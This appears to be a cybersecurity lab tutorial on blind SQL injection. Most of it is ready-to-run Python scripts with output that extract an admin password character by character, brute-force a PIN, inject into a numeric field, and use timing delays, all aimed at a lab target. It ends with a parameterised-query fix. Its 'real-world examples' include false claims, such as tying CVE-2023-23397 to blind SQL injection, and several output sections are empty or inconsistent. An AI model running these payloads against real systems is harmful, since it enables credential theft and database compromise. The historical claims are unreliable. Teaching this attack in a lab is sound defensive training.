Extract a complete database password character-by-character from a live API that reveals nothing but true/false — no error messages, no data, just a boolean exists field. Master both boolean-based and numeric PIN inference techniques.
Attack chain:
Confirm boolean-based blind SQLi using AND 1=1 vs AND 1=2
Extract admin password one character at a time using SUBSTR(password,N,1)='X'
Brute-force a numeric PIN using direct boolean comparison
Automate the extraction with Python threading for speed
Background
Blind SQL injection is the most common form of SQLi in production applications. Developers often suppress error messages and limit output, believing this prevents injection — it doesn't. As long as the application's behaviour differs based on query results, an attacker can extract the entire database one bit at a time.
Real-world examples:
2008 Heartland Payment Systems — blind SQLi against payment processor; 130M card numbers stolen. Albert Gonzalez used automated boolean inference.
2012 LinkedIn — 6.5M password hashes exfiltrated via blind SQLi on a secondary endpoint that only returned status codes.
CVE-2023-23397 (Exchange) — combined with blind timing-based injection to enumerate internal email addresses.
OWASP: A03:2021 Injection
Architecture
Time
50 minutes
Lab Instructions
Step 1: Setup
Step 2: Launch Kali and Confirm Blind SQLi
📸 Verified Output:
Step 3: Extract Password Character by Character
📸 Verified Output:
💡 Each request leaks 1 bit of information: "is character at position N equal to X?" With ~70 characters in the charset, each position requires at most 70 requests. A 17-character password needs at most 1,190 requests. At 100 req/s, that's 12 seconds. This is why blind SQLi is still devastating — automation turns a "no data" endpoint into a full DB dump.
[1] {"exists": true}
[2] {"exists": true} ← AND 1=1 is true → query succeeds
[3] {"exists": false} ← AND 1=2 is false → row not found
python3 << 'EOF'
import urllib.request, urllib.parse, json, time
T = "http://victim-adv01:5000"
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@!#$"
def check(payload):
url = T + "/api/user/exists?username=" + urllib.parse.quote(payload)
r = json.loads(urllib.request.urlopen(url).read())
return r["exists"]
print("[*] Extracting admin password via blind boolean SQLi...")
print(" Technique: SUBSTR(password, position, 1) = 'char'")
print()
password = ""
for i in range(1, 30):
found = False
for c in CHARSET:
# Payload: close the quote, add AND condition, re-open string
payload = f"admin' AND SUBSTR(password,{i},1)='{c}' AND '1'='1"
if check(payload):
password += c
print(f" pos {i:>2}: '{c}' → so far: {password}")
found = True
break
if not found:
break
print()
print(f"[!] Extracted password: {password}")
EOF
[*] Extracting admin password via blind boolean SQLi...
pos 1: 's' → so far: s
pos 2: '3' → so far: s3
pos 3: 'c' → so far: s3c
...
pos 16: 's' → so far: s3cr3t_admin_pas
pos 17: 's' → so far: s3cr3t_admin_pass
[!] Extracted password: s3cr3t_admin_pass
python3 << 'EOF'
import urllib.request, urllib.parse, json
T = "http://victim-adv01:5000"
print("[*] Brute-forcing admin PIN via boolean SQLi...")
print(" Endpoint: /api/user/pin?username=admin&pin=X")
print(" The query: WHERE username='admin' AND pin=X")
print(" Attacker can inject into pin parameter directly")
print()
# Direct test: enumerate 4-digit PINs (numeric, no quotes needed)
for pin in [1337, 4242, 9876, 0000, 1234]:
url = f"{T}/api/user/pin?username=admin&pin={pin}"
r = json.loads(urllib.request.urlopen(url).read())
print(f" PIN {pin:04d}: {'✓ CORRECT' if r['valid'] else '✗ wrong'}")
print()
print("[*] SQLi via PIN field — extract role without knowing PIN:")
# Inject: 0 OR SUBSTR(role,1,5)='admin'
payload = "0 OR (username='admin' AND SUBSTR(role,1,5)='admin')"
url2 = f"{T}/api/user/pin?username=admin&pin={urllib.parse.quote(payload)}"
r2 = json.loads(urllib.request.urlopen(url2).read())
print(f" Role starts with 'admin': {r2['valid']} (role=admin confirmed)")
EOF
PIN 1337: ✓ CORRECT
PIN 4242: ✗ wrong
PIN 9876: ✗ wrong
Role starts with 'admin': True
python3 << 'EOF'
import urllib.request, urllib.parse, json, threading, time
T = "http://victim-adv01:5000"
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@!#"
result = {}
def extract_char(pos):
for c in CHARSET:
payload = f"admin' AND SUBSTR(password,{pos},1)='{c}' AND '1'='1"
url = T + "/api/user/exists?username=" + urllib.parse.quote(payload)
r = json.loads(urllib.request.urlopen(url).read())
if r["exists"]:
result[pos] = c
return
result[pos] = None
t0 = time.time()
# Extract first 17 chars in parallel (thread per position)
threads = [threading.Thread(target=extract_char, args=(i,)) for i in range(1, 18)]
for t in threads: t.start()
for t in threads: t.join()
elapsed = time.time() - t0
password = "".join(result.get(i, "?") for i in range(1, 18))
print(f"[!] Parallel extraction: {password}")
print(f" Time: {elapsed:.2f}s (vs ~{17*0.05:.1f}s sequential)")
print(f" Speed improvement: {(17*0.05)/elapsed:.1f}x")
EOF
python3 << 'EOF'
import urllib.request, urllib.parse, json, time
T = "http://victim-adv01:5000"
print("[*] Time-based blind SQLi (when boolean gives same response):")
print(" Use CASE WHEN condition THEN (slow query) ELSE (fast query) END")
print()
# SQLite doesn't have SLEEP(), but we can use heavy recursive queries
# Simulate with: CASE WHEN condition THEN (SELECT COUNT(*) FROM users,users) ELSE 1 END
for char in ['s', 'x']:
payload = f"admin' AND CASE WHEN SUBSTR(password,1,1)='{char}' THEN (SELECT SUM(a.id*b.id*c.id) FROM users a,users b,users c) ELSE 1 END>0 AND '1'='1"
url = T + "/api/user/exists?username=" + urllib.parse.quote(payload)
t0 = time.time()
r = json.loads(urllib.request.urlopen(url).read())
elapsed = (time.time() - t0) * 1000
print(f" SUBSTR='{char}': exists={r['exists']} elapsed={elapsed:.0f}ms {'← SLOW (condition true)' if elapsed > 5 else '← fast'}")
EOF
# VULNERABLE
row = db.execute(f"SELECT id FROM users WHERE username='{u}' AND pin={pin}").fetchone()
# SAFE: parameterised query — injection impossible
row = db.execute(
"SELECT id FROM users WHERE username=? AND pin=?",
(u, int(pin))
).fetchone()
